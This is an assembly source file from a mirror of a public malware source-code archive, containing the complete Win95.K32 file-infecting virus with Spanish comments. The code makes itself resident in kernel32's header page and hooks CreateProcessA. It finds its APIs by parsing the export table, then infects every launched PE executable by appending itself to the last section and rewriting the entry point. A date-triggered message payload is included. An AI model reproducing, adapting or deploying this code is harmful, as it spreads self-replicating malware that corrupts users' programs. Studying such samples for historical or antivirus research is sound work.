mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-21 02:46:10 +00:00
745 lines
24 KiB
NASM
745 lines
24 KiB
NASM
;***********************************************************************
|
||
;* *
|
||
;* VIRUS WIN95.K32 By nIgr0 *
|
||
;* *
|
||
;***********************************************************************
|
||
;
|
||
; Virus residente, pa win95
|
||
; Uso el espacio libre dejado por el header del kernel32
|
||
; dentro de la primera p gina.
|
||
; Parcheo el API CreateProcessA mediante un JMP
|
||
; Modifico los permisos de las p ginas que voy a utilizar
|
||
; mediante una llamada a CALLVXD0 (_PageModifyPermissions)
|
||
; Vxd 01 servicio 0d.
|
||
; Hallo la direccion de las apis a utilizar buscando en la
|
||
; export table del kernel32 , supongo la direcci?n base del
|
||
; kernel32.dll como 0bff70000h . La unica comprobaci?n que hago
|
||
; al respecto es mirar en la pila [sp+3]=0b7h, con lo que
|
||
; por lo menos si no es 0bff70000h se acerca :)
|
||
; Infecto aumentando la ultima secci?n del file y modifico el
|
||
; entrypoint del file, pero no modifico los atributos de la ?ltima
|
||
; secci?n aunque estos sean de solo lectura ,paso completamente de esos
|
||
; atributos y luego mientras se ejecuta el virus este se pone los
|
||
; atributos de pagina que quiera mediante el servicio
|
||
; _PageModifyPermissions.
|
||
;
|
||
|
||
|
||
|
||
.386p
|
||
.model flat,STDCALL
|
||
include win32.inc
|
||
|
||
extrn ExitProcess:PROC
|
||
extrn MessageBoxA:PROC ;apis exportadas unicamente en la primera
|
||
extrn CreateProcessA:proc ;generaci?n
|
||
|
||
|
||
;*********** Aqu? algunas equs interesantes ****************
|
||
|
||
viriisize equ (((offset end - offset start)+064h)/065h)*065h
|
||
K32 equ 0bff70000h
|
||
hueco equ 0bffc0400h ;Zona en el header
|
||
|
||
GENERIC_READ EQU 80000000H ;abre archivo para lectura
|
||
GENERIC_WRITE EQU 40000000H ;abre el archivo para escritura
|
||
OPEN_EXISTING EQU 3 ;usado por CreateFile para abrir archivo existente
|
||
|
||
|
||
.data
|
||
|
||
dummy db 0 ;de esta secci?n paso
|
||
mess db 'nIgrO rUlez!!!$',0
|
||
text db 'Virus Win95.K32 .... Ejecutado',0
|
||
|
||
|
||
|
||
.code
|
||
start:
|
||
xor eax,eax ;este es el codigo de un Hoste Ficticio
|
||
push eax
|
||
lea eax,mess
|
||
push eax
|
||
lea eax,text
|
||
push eax
|
||
xor eax,eax
|
||
push eax
|
||
|
||
nop
|
||
nop
|
||
nop
|
||
nop
|
||
nop
|
||
|
||
; call MessageBoxA
|
||
|
||
|
||
|
||
Lajodimos:
|
||
|
||
Push LARGE -1
|
||
call ExitProcess
|
||
|
||
;***************** Comienzo del Virus **********************
|
||
|
||
startvirii:
|
||
cmp byte ptr [esp+3],0bfh ;verifico que se llama desde el
|
||
jne malasunto ;la direcci?n bf??????h
|
||
|
||
pushad ;pusheo tooo
|
||
push ebp
|
||
|
||
call getdesp ;obtengo el delta
|
||
getdesp: pop ebp
|
||
sub ebp,offset getdesp
|
||
|
||
jmp saltito ;jmp pa esquivar la zona de datos :)
|
||
|
||
;***************** Comienzo de la zona de Datos ***********
|
||
|
||
startdata:
|
||
PARCHE: mov eax,0bff70400h+offset starthook-offset startvirii
|
||
jmp eax
|
||
codigoparcheado:
|
||
db 010h dup (0)
|
||
|
||
FIRMA db 'Virus K32 por nIgr0 ... "Hazlo o no lo hagas pero no lo intentes"',0
|
||
NLH db 'nIgr0_lives_here!!!!',0
|
||
IOBYTES dd 0h,0h
|
||
llamada dd 0bff713d4h ;direcci?n de CallVXD0 hallada anteriormente
|
||
hoste db 'c:\virus\k32\K.EXE',0,' '
|
||
|
||
ahand dd 0 ; handle del virus que abro
|
||
peheaderoffset dd 0 ; Guardo el offset del peheader del archivo
|
||
ObjectTableoffset dd 0 ; Guardo el offset de la object table en memoria
|
||
bytesread dd 0 ; numero de bytes que leo/escrito en el archivo
|
||
|
||
secdesplaza dd 0h
|
||
secphy dd offset startvirii- offset start
|
||
ultfisicalsize dd 0h
|
||
|
||
newobject: ; Zona en la que almaceno el ultimo objeto
|
||
oname db ".nigro",0,0 ; Pa modificarlo a placer
|
||
virtualsize dd 0
|
||
RVA dd 0
|
||
physicalsize dd 0
|
||
physicaloffset dd 0
|
||
reserved dd 0,0,0
|
||
objectflags dd 0h
|
||
|
||
peheader: ; Estructura del Pe header
|
||
signature dd 0
|
||
cputype dw 0
|
||
numObj dw 0
|
||
db 3*4 dup (0)
|
||
NtHeaderSize dw 0
|
||
Flags dw 0
|
||
db 4*4 dup (0)
|
||
entrypointRVA dd 0
|
||
db 3*4 dup (0)
|
||
objalign dd 0
|
||
filealign dd 0
|
||
db 4*4 dup (0)
|
||
imagesize dd 0
|
||
headersize dd 0
|
||
db 400h dup (0)
|
||
|
||
addresstable dd 00h ;direccion de la addresstable en la export table
|
||
nametable dd 00h ;direccion la tabla de punteros a strings (de la export table)
|
||
ordinaltable dd 00h ;puntero a la ordinal table
|
||
contador dd 00h ;pa calcular la posici?n del puntero en la nametable que
|
||
;que apunte a la api buscada.
|
||
apiabuscar dd 00h ;offset donde se encuentra la string de la api a
|
||
;buscar (es usada temporalmente por mi
|
||
;procedimiento GetAdressAPi)
|
||
longitudapi dd 00h
|
||
|
||
;************** Direcciones para las APIS *******************
|
||
|
||
|
||
nombreapis:
|
||
dd 010d
|
||
db 'CreateFile',0,' ' ;strings de las apis que
|
||
dd 014d
|
||
db 'SetFilePointer',0,' ' ;voy a utilizar
|
||
dd 08d
|
||
db 'ReadFile',0,' ' ;junto con el tama<6D>o de la
|
||
dd 09d
|
||
db 'WriteFile',0,' ' ;string
|
||
dd 011d
|
||
db 'CloseHandle',0,' '
|
||
dd 014d
|
||
db 'CreateProcessA',0,' '
|
||
dd 016d
|
||
db 'GetModuleHandleA',0
|
||
dd 014d
|
||
db 'GetProcAddress',0,' '
|
||
direccionesapis:
|
||
|
||
newCreateFile dd 00h ;0bff7799ch ;valores para mi versi?n de WIN :)
|
||
newSetFilePointer dd 00h ;0bff770e4h
|
||
newReadFile dd 00h ;0bff7594ah
|
||
newWriteFile dd 00h ;0bff75951h
|
||
newCloseFile dd 00h ;0bff7bc8bh
|
||
newCreateProcessA dd 00h ;0bff775e8h
|
||
newGetModuleHandleA dd 00h
|
||
newGetProcAddress dd 00h
|
||
|
||
dllmensajito db 'USER32.dll',0
|
||
apimensajito db 'MessageBoxA',0
|
||
|
||
;***************** Fin de la Zona de datos ***********************
|
||
|
||
|
||
saltito:
|
||
;en eax viene el entrypoint del virii
|
||
|
||
mov ebx,eax ;copia de seguridad
|
||
|
||
xor eax,eax ;empiezo a calcular la direccion de CALLVXD0
|
||
mov esi,K32 + 3CH
|
||
lodsw ;en ax me quedar el comienzo del PE header
|
||
|
||
add eax,K32 ;a la que le suma la direcci?n base del Kernel32
|
||
|
||
|
||
cmp dword ptr [EAX],00004550H ;verifico que es un PE header
|
||
je NoERROR
|
||
|
||
ERROR: jmp melaspiro
|
||
|
||
|
||
NoERROR:
|
||
mov esi,[EAX + 78H] ; 78H = la direcci?n a la export table
|
||
add esi,K32 + 1CH ; 1CH RVA para la adress table
|
||
|
||
|
||
lodsd ; en eax queda la RVA al primer ordinal
|
||
add eax,K32 ; es decir la direcci?n a la CALLVXD0
|
||
|
||
push eax ;
|
||
pop esi ;en esi=eax
|
||
|
||
lodsd ;obtengo la RVA de la primera API
|
||
add eax,K32 ;EAX = La direcci?n de la primera API
|
||
|
||
|
||
mov edi,ebx
|
||
and edi,0fffff000h ;calculo la pagina del virii
|
||
ror edi,012d
|
||
push eax
|
||
call modificarpermisos
|
||
pop eax
|
||
|
||
and ebx,00000fffh ;verifico que no va a utilizar 2 paginas
|
||
add ebx,viriisize ;en caso de que utilice 2 paginas , marco
|
||
cmp ebx,01000h ;la segunda pagina tambien para escritura
|
||
jl continuar
|
||
|
||
inc edi
|
||
push eax
|
||
call modificarpermisos
|
||
pop eax
|
||
continuar:
|
||
|
||
mov [ebp+llamada],eax ;salvo la direcci?n de CALLVXD0
|
||
|
||
mov eax,0bff70400h ;verifico que no est residente
|
||
mov ebx,dword ptr [eax]
|
||
cmp ebx,dword ptr [ebp+startvirii]
|
||
je yaresidente
|
||
|
||
|
||
mov ecx,08h ;numero de APis a buscar
|
||
lea esi,ebp+nombreapis
|
||
lea edi,ebp+direccionesapis
|
||
otraapi: ;obtengo la direccion de las apis
|
||
push edi ;que voy a utilizar
|
||
push esi
|
||
push ecx
|
||
call GetAddressApi
|
||
pop ecx
|
||
pop esi
|
||
pop edi
|
||
mov dword ptr [edi],eax
|
||
add edi,4h
|
||
add esi,021d
|
||
dec ecx
|
||
jne otraapi ;bueno en este punto tenemos las direcciones
|
||
;necesarias :)
|
||
|
||
|
||
mov eax,00002a00h
|
||
call INT_21 ;compruebo la fecha del sistema
|
||
|
||
cmp dh,02d
|
||
jne nopayload ;fecha de activaci?n 19d de febrero
|
||
cmp dl,019d
|
||
jne nopayload
|
||
|
||
lea ebx,ebp+dllmensajito ;Obtengo la direccion base de la
|
||
push ebx ;libreria USER32.dll donde reside
|
||
call [ebp+newGetModuleHandleA] ;el api MessageBoxA
|
||
|
||
lea ebx,ebp+apimensajito
|
||
push ebx
|
||
push eax
|
||
call [ebp+newGetProcAddress] ;obtengo la direccion de MessageBoxA
|
||
|
||
push 0
|
||
lea ebx,ebp+NLH
|
||
push ebx
|
||
lea ebx,ebp+FIRMA
|
||
push ebx
|
||
push 0
|
||
call eax ;llamo al api MessageBoxA
|
||
|
||
|
||
nopayload:
|
||
|
||
mov edi,0bff70h
|
||
call desprotegerpagina
|
||
mov edi,dword ptr [ebp+newCreateProcessA]
|
||
and edi,0fffff000h
|
||
ror edi,012d
|
||
call desprotegerpagina ;desprotejo 2 paginas una para poder
|
||
;parchear el api y otra en la que
|
||
;quedar<61> residente
|
||
inc edi
|
||
call desprotegerpagina ;y la siguiente
|
||
|
||
mov esi,dword ptr [ebp+newCreateProcessA]
|
||
lea edi,ebp+codigoparcheado
|
||
mov ecx,010h
|
||
rep movsb ;copio los 10h primeros bytes del api
|
||
;CreateProcess
|
||
;para poder devolver el control al API
|
||
;cuando sea llamada.
|
||
|
||
lea esi,ebp+PARCHE
|
||
mov edi,dword ptr [ebp+newCreateProcessA] ;pongo el jmp
|
||
mov ecx,010h ;en la API ;del api
|
||
rep movsb
|
||
|
||
lea esi,ebp+startvirii
|
||
mov edi,0bff70400h
|
||
mov ecx,viriisize
|
||
rep movsb ;copio el virus en memoria
|
||
|
||
yaresidente:
|
||
melaspiro:
|
||
popad
|
||
pop ebp
|
||
malasunto:
|
||
db 0b8h ;esto es un mov eax,inm
|
||
oldip dd 0401000h ;Ip de inicio
|
||
jmp eax
|
||
|
||
enddata:
|
||
;*************** Modifica permisos de pagina *********************
|
||
;en eax la direccion de callvxd0
|
||
;y en edi la pagina a modificar
|
||
|
||
desprotegerpagina: ; LLamada a CALLVXD0
|
||
mov eax,dword ptr [ ebp + offset llamada]
|
||
modificarpermisos:
|
||
push 020060000h ;nuevos atributos de p gina
|
||
push 00h
|
||
push 01h
|
||
push edi
|
||
push 001000dh ;llamada a la VXD 1 servicio D (_PageModifyPermissions)
|
||
call eax
|
||
ret
|
||
|
||
;**************** Rutina para llamar a la int 21h **********************
|
||
|
||
INT_21: ; LLamada a la INT 21
|
||
push ecx
|
||
push eax
|
||
push 002a0010h
|
||
mov eax,dword ptr [ ebp + offset llamada]
|
||
call eax
|
||
RET
|
||
|
||
;************** Procedimiento que encuentra la direccion de las apis ***************
|
||
;************** en la export table del Kernel32 ***************
|
||
|
||
GetAddressApi:
|
||
mov eax,dword ptr [esi]
|
||
mov dword ptr [ebp+longitudapi],eax
|
||
add esi,04h
|
||
mov dword ptr [ebp+apiabuscar],esi ;pusheo el valor de la string
|
||
|
||
xor eax,eax
|
||
mov dword ptr [ebp+contador],eax ;pongo a cero el valor del contador
|
||
mov esi,K32 + 3CH
|
||
lodsw ;en ax me quedar el comienzo del PE header
|
||
|
||
add eax,K32 ;a la que le suma la direcci?n base del Kernel32
|
||
|
||
mov esi,[EAX + 78H] ; 78H = la direcci?n a la export table
|
||
add esi,K32 + 1cH ; 1CH RVA para la adress table
|
||
|
||
|
||
lodsd ;obtengo los offset de algunas TABLAS
|
||
add eax,K32 ;interesantes de la export table
|
||
mov dword ptr [ebp+addresstable],eax
|
||
lodsd
|
||
add eax,K32
|
||
mov dword ptr [ebp+nametable],eax
|
||
lodsd
|
||
add eax,K32
|
||
mov dword ptr [ebp+ordinaltable],eax
|
||
|
||
;ADDRESS TABLE RVA = DD Relative Virtual Address of the Export Address
|
||
;Table.
|
||
;NAME TABLE RVA = DD Relative Virtual Address of the Export Name Table
|
||
;Pointers.
|
||
;ORDINAL TABLE RVA = DD Relative Virtual Address of Export Ordinals
|
||
|
||
|
||
mov eax,dword ptr [ebp+nametable]
|
||
mov esi,eax
|
||
anotherapi:
|
||
push esi
|
||
lodsd
|
||
mov esi,eax
|
||
add esi,K32
|
||
mov edi,dword ptr [ebp+apiabuscar]
|
||
mov ecx,dword ptr [ebp+longitudapi];en ecx el numero de bytes
|
||
cld ;con los que compararemos
|
||
repe cmpsb
|
||
je encontrada
|
||
pop esi
|
||
add esi,04h
|
||
inc dword ptr [ebp+contador]
|
||
jmp anotherapi
|
||
|
||
encontrada:
|
||
pop esi
|
||
|
||
xor eax,eax
|
||
mov eax,dword ptr [ebp+contador]
|
||
add eax,eax
|
||
add eax,dword ptr [ebp+ordinaltable] ;Con el valor de contador
|
||
mov esi,eax ;me voy a la ordinal table
|
||
lodsw ;y busco el ordinal del API
|
||
and eax,0000ffffh
|
||
add eax,eax
|
||
add eax,eax
|
||
add eax,dword ptr [ebp+addresstable] ;Y con el ordinal me voy a la
|
||
mov esi,eax ;adress table
|
||
lodsd
|
||
add eax,K32 ;devuelvo en eax la direccion del API
|
||
ret
|
||
|
||
|
||
;***************************************************************************
|
||
;* *
|
||
;* Comienzo de la Rutina que intercepa la API CreateProcessA *
|
||
;* *
|
||
;***************************************************************************
|
||
|
||
|
||
starthook:
|
||
push ebp
|
||
call getdelta ;obtengo el delta
|
||
getdelta: pop ebp
|
||
sub ebp,offset getdelta
|
||
|
||
|
||
mov eax,[esp+0ch] ;obtengo el puntero a la cadena de texto
|
||
;de la pila :)
|
||
pushad ;pusheo tooo
|
||
|
||
mov esi,eax
|
||
lea edi,ebp+hoste
|
||
otrocar: cmp byte ptr [esi],0 ;copio la cadena de texto con el nombre
|
||
je sacabo ;de la victima en la variable hoste
|
||
movsb
|
||
jmp otrocar
|
||
sacabo: movsb ;copio el 0 tambi<62>n
|
||
|
||
lea esi,ebp+hoste
|
||
cmp byte ptr [esi],022h
|
||
jne proseguir ;rehago el string por si est
|
||
;entre comillas
|
||
lea edi,ebp+hoste
|
||
inc esi
|
||
mascara: cmp byte ptr [esi],022h
|
||
je finalizar
|
||
movsb
|
||
jmp mascara
|
||
finalizar: mov byte ptr [esi],0h
|
||
movsb
|
||
proseguir: cmp word ptr [edi-3h],'EX'
|
||
je esunexe
|
||
cmp word ptr [edi-3h],'ex'
|
||
je esunexe
|
||
jmp emergencia
|
||
esunexe:
|
||
lea esi,ebp+hoste ;Abro el archivo
|
||
xor eax,eax
|
||
push eax
|
||
push eax
|
||
push large OPEN_EXISTING
|
||
push eax
|
||
push eax
|
||
push large GENERIC_READ or GENERIC_WRITE
|
||
mov eax,esi
|
||
push eax
|
||
call dword ptr[ebp + newCreateFile]
|
||
cmp eax,-1
|
||
je emergencia
|
||
|
||
|
||
|
||
mov dword ptr [ebp + offset ahand],eax ; Guardo el handle
|
||
|
||
|
||
; Busco el comienzo del PE header que est en la posici?n 3ch
|
||
|
||
mov edx,03ch
|
||
call moverpuntero
|
||
|
||
; Leo la posici?n del Pe header
|
||
|
||
mov ecx,004h
|
||
lea edx,[ebp + offset peheaderoffset]
|
||
call lectura
|
||
|
||
; Me muevo hasta el PE header
|
||
|
||
mov edx,dword ptr [ebp+offset peheaderoffset]
|
||
call moverpuntero
|
||
|
||
|
||
; Leo un poco del header para calcular todo el tama<6D>o del
|
||
; pe header y object table
|
||
|
||
mov ecx,058h
|
||
lea edx,[ebp + offset peheader]
|
||
call lectura
|
||
|
||
; Llevo el puntero al comienzo del PE header de nuevo
|
||
mov edx,dword ptr [ebp+ offset peheaderoffset]
|
||
call moverpuntero
|
||
|
||
; leo todo el pe header y la object table
|
||
mov ecx,dword ptr [ebp + offset headersize]
|
||
lea edx,[ebp + offset peheader]
|
||
call lectura
|
||
|
||
|
||
|
||
; Me aseguro que es un pe y que no est infectado
|
||
cmp dword ptr [ebp + offset peheader],00004550h ; PE,0,0
|
||
jnz notape
|
||
cmp word ptr [ebp + offset peheader + 4ch],00badh ;si est infectado salir
|
||
jz notape
|
||
|
||
|
||
; marco el archivo como infectado en una zona del Header
|
||
mov word ptr [ebp + offset peheader + 4ch],00badh
|
||
|
||
|
||
; Localizo el offset de la object table
|
||
xor eax,eax
|
||
mov ax, word ptr [ebp + offset NtHeaderSize]
|
||
add eax,18h
|
||
mov dword ptr [ebp + offset ObjectTableoffset],eax
|
||
|
||
;relativo al comienzo del Pe header
|
||
|
||
|
||
;Calculo el Offset del ?ltimo objecto de la tabla
|
||
mov esi,dword ptr [ebp + offset ObjectTableoffset]
|
||
lea eax,[ebp + offset peheader]
|
||
add esi,eax
|
||
xor eax,eax
|
||
mov ax,[ebp + offset numObj]
|
||
mov ecx,40d
|
||
xor edx,edx
|
||
mul ecx
|
||
add esi,eax
|
||
|
||
sub esi,40d
|
||
|
||
lea edi,[ebp + offset newobject]
|
||
|
||
mov ecx,10d
|
||
push esi
|
||
push edi
|
||
rep movsd ;copio la entrada en la object table en memoria
|
||
|
||
|
||
mov eax,dword ptr [ebp + offset physicalsize]
|
||
mov dword ptr [ebp + offset ultfisicalsize],eax
|
||
mov dword ptr [ebp + offset secphy],eax
|
||
|
||
; Calcula el tama<6D>o fisico pa el ultimo object
|
||
mov ecx,dword ptr [ebp + offset filealign]
|
||
mov eax,dword ptr [ebp + offset physicalsize]
|
||
add eax,viriisize
|
||
xor edx,edx
|
||
div ecx
|
||
inc eax
|
||
mul ecx
|
||
mov dword ptr [ebp + offset physicalsize],eax
|
||
|
||
mov eax,dword ptr [ebp + offset virtualsize]
|
||
mov dword ptr [ebp+ offset secdesplaza],eax ;el tama<6D>o virtual ser
|
||
;el desplazamiento dentro de la secci?n
|
||
;RVA del objeto + desplazamiento virtual= entrypoint RVA
|
||
|
||
; calcula el tama<6D>o virtual del objeto modificado
|
||
mov ecx,dword ptr [ebp + offset objalign]
|
||
mov eax,dword ptr [ebp + offset virtualsize]
|
||
add eax,viriisize
|
||
xor edx,edx
|
||
div ecx
|
||
inc eax
|
||
mul ecx
|
||
mov dword ptr [ebp + offset virtualsize],eax
|
||
|
||
|
||
; Modifico la image size del archivo.
|
||
|
||
mov eax,viriisize
|
||
add eax,dword ptr [ebp + offset imagesize]
|
||
mov ecx,[ebp + offset objalign]
|
||
xor edx,edx
|
||
div ecx
|
||
inc eax
|
||
mul ecx
|
||
mov dword ptr [ebp + offset imagesize],eax
|
||
|
||
; Copio el objeto modificado en el buffer
|
||
|
||
pop esi
|
||
pop edi
|
||
mov ecx,10d
|
||
rep movsd
|
||
|
||
|
||
; Calculo la nueva Entrypoint RVA
|
||
mov eax,dword ptr [ebp + offset RVA]
|
||
add eax,dword ptr [ebp + offset secphy]
|
||
mov ebx,dword ptr [ebp + offset entrypointRVA]
|
||
mov dword ptr [ebp + offset entrypointRVA],eax
|
||
|
||
add ebx,dword ptr [ebp + offset peheader + 34h] ;le sumo la base adress
|
||
mov dword ptr [ebp + offset oldip],ebx
|
||
|
||
;completo la variable oldip para generar
|
||
;el jump al hoste
|
||
|
||
|
||
; de nuevo al Pe header
|
||
mov edx,dword ptr [ebp+offset peheaderoffset]
|
||
call moverpuntero
|
||
|
||
; Escribo el pe header y la object table en el archivo
|
||
|
||
mov ecx,dword ptr [ebp + offset headersize]
|
||
lea edx,[ebp + offset peheader]
|
||
call escritura
|
||
|
||
; Me voy al final del file para copiar el virus
|
||
mov edx,dword ptr [ebp + offset physicaloffset]
|
||
add edx,dword ptr [ebp + offset ultfisicalsize]
|
||
call moverpuntero
|
||
|
||
|
||
; Copio el virus al final (de la ultima secci?n)
|
||
mov ecx,viriisize
|
||
lea edx,[ebp + offset startvirii]
|
||
call escritura
|
||
|
||
|
||
notape:
|
||
push dword ptr [ebp + ahand]
|
||
call dword ptr [ebp + newCloseFile]
|
||
|
||
|
||
emergencia:
|
||
|
||
lea esi,ebp+codigoparcheado
|
||
mov edi,dword ptr [ebp+newCreateProcessA] ;pongo otra vez
|
||
mov ecx,010h ;los 010h primeros bytes
|
||
rep movsb ;del api
|
||
|
||
|
||
popad
|
||
pop ebp
|
||
|
||
call getdelta2 ;obtengo el delta otra vez
|
||
getdelta2:pop eax
|
||
sub eax,offset getdelta2
|
||
|
||
|
||
pop dword ptr [eax+dirretorno]
|
||
call dword ptr [eax+newCreateProcessA] ;llamo a la api
|
||
|
||
push ebp
|
||
call getdelta3 ;obtengo el delta otra vez
|
||
getdelta3:pop ebp
|
||
sub ebp,offset getdelta3
|
||
|
||
pushad
|
||
|
||
lea esi,ebp+PARCHE
|
||
mov edi,dword ptr [ebp+newCreateProcessA] ;pongo otra vez
|
||
mov ecx,010h ;el parche ;del api
|
||
rep movsb
|
||
popad
|
||
pop ebp
|
||
db 068h ;opcode de un push
|
||
dirretorno dd 00h
|
||
ret
|
||
|
||
lectura: ;Llamada al api ReadFile
|
||
push large 0 ;En ecx: Numero de bytes a leer
|
||
lea eax,[ebp +IOBYTES] ;En edx: el offset del buffer
|
||
push eax
|
||
push ecx
|
||
push edx
|
||
push dword ptr [ebp + ahand]
|
||
call dword ptr [ebp + newReadFile]
|
||
ret
|
||
|
||
moverpuntero: ;Llamada al api SetFilePointer
|
||
push LARGE 0 ;en edx: el offset del archivo
|
||
push LARGE 0
|
||
push edx
|
||
push dword ptr [ebp + ahand]
|
||
call dword ptr [EBP + newSetFilePointer]
|
||
ret
|
||
|
||
escritura: ;Llamada al api WriteFile
|
||
;en ecx: bytes a escribir
|
||
;en edx: offset del buffer
|
||
push LARGE 0
|
||
LEA eax,[ebp + IOBYTES]
|
||
push eax
|
||
push ecx
|
||
push edx
|
||
push dword ptr [ebp + ahand]
|
||
call dword ptr [ebp + newWriteFile]
|
||
jur: ret
|
||
|
||
endhook:
|
||
endvirii:
|
||
end:
|
||
end startvirii
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|